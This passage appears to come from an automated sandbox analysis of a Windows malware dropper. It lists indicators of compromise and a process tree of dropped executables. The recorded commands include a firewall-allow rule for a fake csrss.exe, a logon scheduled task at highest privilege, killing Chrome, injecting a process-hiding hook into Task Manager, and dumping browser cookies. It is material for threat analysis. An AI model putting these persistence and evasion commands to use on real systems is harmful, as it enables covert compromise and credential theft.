Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	Graphics.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exeGraphics.exe

pid	process
1348	pub2.exe
1348	pub2.exe
4744	jfiag3g_gg.exe
4744	jfiag3g_gg.exe
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
408	Graphics.exe
408	Graphics.exe
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

1348 pub2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Install.exeSoCleanInst.exetaskkill.exemd9_1sjm.exeGraphics.exesvchost.exe

description	pid	process
Token: SeCreateTokenPrivilege	4544	Install.exe
Token: SeAssignPrimaryTokenPrivilege	4544	Install.exe
Token: SeLockMemoryPrivilege	4544	Install.exe
Token: SeIncreaseQuotaPrivilege	4544	Install.exe
Token: SeMachineAccountPrivilege	4544	Install.exe
Token: SeTcbPrivilege	4544	Install.exe
Token: SeSecurityPrivilege	4544	Install.exe
Token: SeTakeOwnershipPrivilege	4544	Install.exe
Token: SeLoadDriverPrivilege	4544	Install.exe
Token: SeSystemProfilePrivilege	4544	Install.exe
Token: SeSystemtimePrivilege	4544	Install.exe
Token: SeProfSingleProcessPrivilege	4544	Install.exe
Token: SeIncBasePriorityPrivilege	4544	Install.exe
Token: SeCreatePagefilePrivilege	4544	Install.exe
Token: SeCreatePermanentPrivilege	4544	Install.exe
Token: SeBackupPrivilege	4544	Install.exe
Token: SeRestorePrivilege	4544	Install.exe
Token: SeShutdownPrivilege	4544	Install.exe
Token: SeDebugPrivilege	4544	Install.exe
Token: SeAuditPrivilege	4544	Install.exe
Token: SeSystemEnvironmentPrivilege	4544	Install.exe
Token: SeChangeNotifyPrivilege	4544	Install.exe
Token: SeRemoteShutdownPrivilege	4544	Install.exe
Token: SeUndockPrivilege	4544	Install.exe
Token: SeSyncAgentPrivilege	4544	Install.exe
Token: SeEnableDelegationPrivilege	4544	Install.exe
Token: SeManageVolumePrivilege	4544	Install.exe
Token: SeImpersonatePrivilege	4544	Install.exe
Token: SeCreateGlobalPrivilege	4544	Install.exe
Token: 31	4544	Install.exe
Token: 32	4544	Install.exe
Token: 33	4544	Install.exe
Token: 34	4544	Install.exe
Token: 35	4544	Install.exe
Token: SeDebugPrivilege	456	SoCleanInst.exe
Token: SeDebugPrivilege	4960	taskkill.exe
Token: SeManageVolumePrivilege	2528	md9_1sjm.exe
Token: SeManageVolumePrivilege	2528	md9_1sjm.exe
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeManageVolumePrivilege	2528	md9_1sjm.exe
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeDebugPrivilege	408	Graphics.exe
Token: SeImpersonatePrivilege	408	Graphics.exe
Token: SeTcbPrivilege	1328	svchost.exe
Token: SeTcbPrivilege	1328	svchost.exe
Token: SeManageVolumePrivilege	2528	md9_1sjm.exe
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

2kHl1vLDsZ4d0eTrthNntegB.exe

pid process

1528 2kHl1vLDsZ4d0eTrthNntegB.exe

pid	process
1528	2kHl1vLDsZ4d0eTrthNntegB.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exeFolder.exeFiles.exeInstall.execmd.exerUNdlL32.eXesvchost.exeGraphics.execmd.execsrss.exeFile.exe

description	pid	process	target process
PID 3816 wrote to memory of 456	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	SoCleanInst.exe
PID 3816 wrote to memory of 456	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	SoCleanInst.exe
PID 3816 wrote to memory of 2528	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	md9_1sjm.exe
PID 3816 wrote to memory of 2528	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	md9_1sjm.exe
PID 3816 wrote to memory of 2528	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	md9_1sjm.exe
PID 3816 wrote to memory of 4272	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Folder.exe
PID 3816 wrote to memory of 4272	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Folder.exe
PID 3816 wrote to memory of 4272	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Folder.exe
PID 3816 wrote to memory of 408	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Graphics.exe
PID 3816 wrote to memory of 408	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Graphics.exe
PID 3816 wrote to memory of 408	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Graphics.exe
PID 3816 wrote to memory of 4548	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Updbdate.exe
PID 3816 wrote to memory of 4548	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Updbdate.exe
PID 3816 wrote to memory of 4548	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Updbdate.exe
PID 3816 wrote to memory of 4544	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Install.exe
PID 3816 wrote to memory of 4544	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Install.exe
PID 3816 wrote to memory of 4544	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Install.exe
PID 3816 wrote to memory of 3272	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Files.exe
PID 3816 wrote to memory of 3272	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Files.exe
PID 3816 wrote to memory of 3272	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	Files.exe
PID 3816 wrote to memory of 1348	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	pub2.exe
PID 3816 wrote to memory of 1348	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	pub2.exe
PID 3816 wrote to memory of 1348	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	pub2.exe
PID 3816 wrote to memory of 1968	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	File.exe
PID 3816 wrote to memory of 1968	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	File.exe
PID 3816 wrote to memory of 1968	3816	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe	File.exe
PID 4272 wrote to memory of 2132	4272	Folder.exe	Folder.exe
PID 4272 wrote to memory of 2132	4272	Folder.exe	Folder.exe
PID 4272 wrote to memory of 2132	4272	Folder.exe	Folder.exe
PID 3272 wrote to memory of 3756	3272	Files.exe	jfiag3g_gg.exe
PID 3272 wrote to memory of 3756	3272	Files.exe	jfiag3g_gg.exe
PID 3272 wrote to memory of 3756	3272	Files.exe	jfiag3g_gg.exe
PID 4544 wrote to memory of 812	4544	Install.exe	cmd.exe
PID 4544 wrote to memory of 812	4544	Install.exe	cmd.exe
PID 4544 wrote to memory of 812	4544	Install.exe	cmd.exe
PID 812 wrote to memory of 4960	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 4960	812	cmd.exe	taskkill.exe
PID 812 wrote to memory of 4960	812	cmd.exe	taskkill.exe
PID 4600 wrote to memory of 5012	4600	rUNdlL32.eXe	rundll32.exe
PID 4600 wrote to memory of 5012	4600	rUNdlL32.eXe	rundll32.exe
PID 4600 wrote to memory of 5012	4600	rUNdlL32.eXe	rundll32.exe
PID 3272 wrote to memory of 4744	3272	Files.exe	jfiag3g_gg.exe
PID 3272 wrote to memory of 4744	3272	Files.exe	jfiag3g_gg.exe
PID 3272 wrote to memory of 4744	3272	Files.exe	jfiag3g_gg.exe
PID 1328 wrote to memory of 2564	1328	svchost.exe	Graphics.exe
PID 1328 wrote to memory of 2564	1328	svchost.exe	Graphics.exe
PID 1328 wrote to memory of 2564	1328	svchost.exe	Graphics.exe
PID 2564 wrote to memory of 1204	2564	Graphics.exe	cmd.exe
PID 2564 wrote to memory of 1204	2564	Graphics.exe	cmd.exe
PID 1204 wrote to memory of 4120	1204	cmd.exe	netsh.exe
PID 1204 wrote to memory of 4120	1204	cmd.exe	netsh.exe
PID 2564 wrote to memory of 1744	2564	Graphics.exe	csrss.exe
PID 2564 wrote to memory of 1744	2564	Graphics.exe	csrss.exe
PID 2564 wrote to memory of 1744	2564	Graphics.exe	csrss.exe
PID 1328 wrote to memory of 4780	1328	svchost.exe	schtasks.exe
PID 1328 wrote to memory of 4780	1328	svchost.exe	schtasks.exe
PID 1744 wrote to memory of 1436	1744	csrss.exe	injector.exe
PID 1744 wrote to memory of 1436	1744	csrss.exe	injector.exe
PID 1968 wrote to memory of 3680	1968	File.exe	Oa_1rAeU7cyuqEq9ZqIu5KWu.exe
PID 1968 wrote to memory of 3680	1968	File.exe	Oa_1rAeU7cyuqEq9ZqIu5KWu.exe
PID 1968 wrote to memory of 1528	1968	File.exe	2kHl1vLDsZ4d0eTrthNntegB.exe
PID 1968 wrote to memory of 1528	1968	File.exe	2kHl1vLDsZ4d0eTrthNntegB.exe
PID 1968 wrote to memory of 1528	1968	File.exe	2kHl1vLDsZ4d0eTrthNntegB.exe
PID 1968 wrote to memory of 1716	1968	File.exe	rTrECCRopMbKTIfmDNAC6NA3.exe

C:\Users\Admin\AppData\Local\Temp\79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe
"C:\Users\Admin\AppData\Local\Temp\79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3816

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:456

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:2528

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 288
3⤵
- Program crash
PID:116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 288
3⤵
- Program crash
PID:4948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 340
3⤵
- Program crash
PID:2736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 656
3⤵
- Program crash
PID:4720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 656
3⤵
- Program crash
PID:4240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 656
3⤵
- Program crash
PID:2492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 656
3⤵
- Program crash
PID:4028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 728
3⤵
- Program crash
PID:3360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 748
3⤵
- Program crash
PID:2620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 800
3⤵
- Program crash
PID:2336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 608
3⤵
- Program crash
PID:3604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 724
3⤵
- Program crash
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 832
3⤵
- Program crash
PID:4988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 736
3⤵
- Program crash
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 792
3⤵
- Program crash
PID:2492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 832
3⤵
- Program crash
PID:808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 792
3⤵
- Program crash
PID:2504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 744
3⤵
- Program crash
PID:4600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 616
3⤵
- Program crash
PID:4404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 768
3⤵
- Program crash
PID:4372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 880
3⤵
- Program crash
PID:1080

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 292
4⤵
- Program crash
PID:4344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 296
4⤵
- Program crash
PID:3464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 296
4⤵
- Program crash
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 636
4⤵
- Program crash
PID:752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 636
4⤵
- Program crash
PID:1480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 636
4⤵
- Program crash
PID:2404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 696
4⤵
- Program crash
PID:1712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 692
4⤵
- Program crash
PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 728
4⤵
- Program crash
PID:5096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 724
4⤵
- Program crash
PID:4956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 860
4⤵
- Program crash
PID:2720

C:\Users\Admin\Pictures\Adobe Films\77WTdNbyUCpZYQXpZH3g66Mz.exe
"C:\Users\Admin\Pictures\Adobe Films\77WTdNbyUCpZYQXpZH3g66Mz.exe"
5⤵
PID:2980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 580
4⤵
- Program crash
PID:544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 824
4⤵
- Program crash
PID:4984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 580
4⤵
- Program crash
PID:1384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 904
4⤵
- Program crash
PID:4240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 748
4⤵
- Program crash
PID:3992

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:1204

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:4120

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 328
5⤵
- Program crash
PID:1308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 332
5⤵
- Program crash
PID:4600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 332
5⤵
- Program crash
PID:2908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 664
5⤵
- Program crash
PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 664
5⤵
- Program crash
PID:1504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 664
5⤵
- Program crash
PID:1296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 664
5⤵
- Program crash
PID:2480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 748
5⤵
- Program crash
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 720
5⤵
- Program crash
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 616
5⤵
- Program crash
PID:4316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 460
6⤵
PID:1288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 468
6⤵
PID:1648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 896
5⤵
- Program crash
PID:1052

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:4780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 856
5⤵
- Program crash
PID:3628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 856
5⤵
- Program crash
PID:3360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 856
5⤵
- Program crash
PID:3024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 856
5⤵
- Program crash
PID:3796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 856
5⤵
- Program crash
PID:316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 996
5⤵
- Program crash
PID:4052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 984
5⤵
- Program crash
PID:2268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 996
5⤵
- Program crash
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 996
5⤵
- Program crash
PID:1780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 1056
5⤵
- Program crash
PID:3868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 1032
5⤵
- Program crash
PID:4920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 968
5⤵
- Program crash
PID:3976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 980
5⤵
- Program crash
PID:3452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 880
5⤵
- Program crash
PID:4136

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:1436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 940
5⤵
PID:4364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 988
5⤵
PID:1128

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4272

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:2132

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:4548

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4544

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:812

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4960

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3272

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:3756

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4744

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1348

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1968

C:\Users\Admin\Pictures\Adobe Films\Oa_1rAeU7cyuqEq9ZqIu5KWu.exe
"C:\Users\Admin\Pictures\Adobe Films\Oa_1rAeU7cyuqEq9ZqIu5KWu.exe"
3⤵
- Executes dropped EXE
PID:3680

C:\Users\Admin\Pictures\Adobe Films\2kHl1vLDsZ4d0eTrthNntegB.exe
"C:\Users\Admin\Pictures\Adobe Films\2kHl1vLDsZ4d0eTrthNntegB.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1528

C:\Users\Admin\Documents\ExhrWmm4uyttwXHs718OoITb.exe
"C:\Users\Admin\Documents\ExhrWmm4uyttwXHs718OoITb.exe"
4⤵
PID:2024

C:\Users\Admin\Pictures\Adobe Films\j77udLC6BHKMW7SRhXaA7Ts4.exe
"C:\Users\Admin\Pictures\Adobe Films\j77udLC6BHKMW7SRhXaA7Ts4.exe"
5⤵
PID:1300

C:\Users\Admin\Pictures\Adobe Films\By0B48NCBvMl1WR5dY2Fqvhw.exe
"C:\Users\Admin\Pictures\Adobe Films\By0B48NCBvMl1WR5dY2Fqvhw.exe"
5⤵
PID:3152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 624
6⤵
PID:2000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 632
6⤵
PID:5084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 588
6⤵
PID:3760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 676
6⤵
PID:3628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1268
6⤵
PID:5948

C:\Users\Admin\Pictures\Adobe Films\ueZB6ARNTGs9uw5oWCCgpBwH.exe
"C:\Users\Admin\Pictures\Adobe Films\ueZB6ARNTGs9uw5oWCCgpBwH.exe"
5⤵
PID:4108

C:\Users\Admin\AppData\Local\Temp\7zSFE5E.tmp\Install.exe
.\Install.exe
6⤵
PID:4112

C:\Users\Admin\AppData\Local\Temp\7zS2ADC.tmp\Install.exe
.\Install.exe /S /site_id "525403"
7⤵
PID:2000

C:\Users\Admin\Pictures\Adobe Films\Yz15axl0rGFnccoGQQ34MDx5.exe
"C:\Users\Admin\Pictures\Adobe Films\Yz15axl0rGFnccoGQQ34MDx5.exe"
5⤵
PID:4136

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\a6U_WGm.9B
6⤵
PID:3784

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
7⤵
PID:1408

C:\Users\Admin\Pictures\Adobe Films\NTsXukM66k4GsxOchy9frXMO.exe
"C:\Users\Admin\Pictures\Adobe Films\NTsXukM66k4GsxOchy9frXMO.exe"
5⤵
PID:4668

C:\Users\Admin\Pictures\Adobe Films\eWsUKDmlB06xLSm9GqHTRwJY.exe
"C:\Users\Admin\Pictures\Adobe Films\eWsUKDmlB06xLSm9GqHTRwJY.exe"
5⤵
PID:3644

C:\Users\Admin\Pictures\Adobe Films\Z4Xdyz1a85pV70bN03mLqR5h.exe
"C:\Users\Admin\Pictures\Adobe Films\Z4Xdyz1a85pV70bN03mLqR5h.exe"
5⤵
PID:1796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 868
6⤵
PID:1704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 988
6⤵
PID:5768

C:\Users\Admin\Pictures\Adobe Films\EvBKu5bIf6o_VFBCaBd8DTZL.exe
"C:\Users\Admin\Pictures\Adobe Films\EvBKu5bIf6o_VFBCaBd8DTZL.exe"
5⤵
PID:4140

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
6⤵
PID:4992

C:\Users\Admin\AppData\Local\Temp\H7MD2.exe
"C:\Users\Admin\AppData\Local\Temp\H7MD2.exe"
7⤵
PID:5364

C:\Users\Admin\AppData\Local\Temp\H7MD2.exe
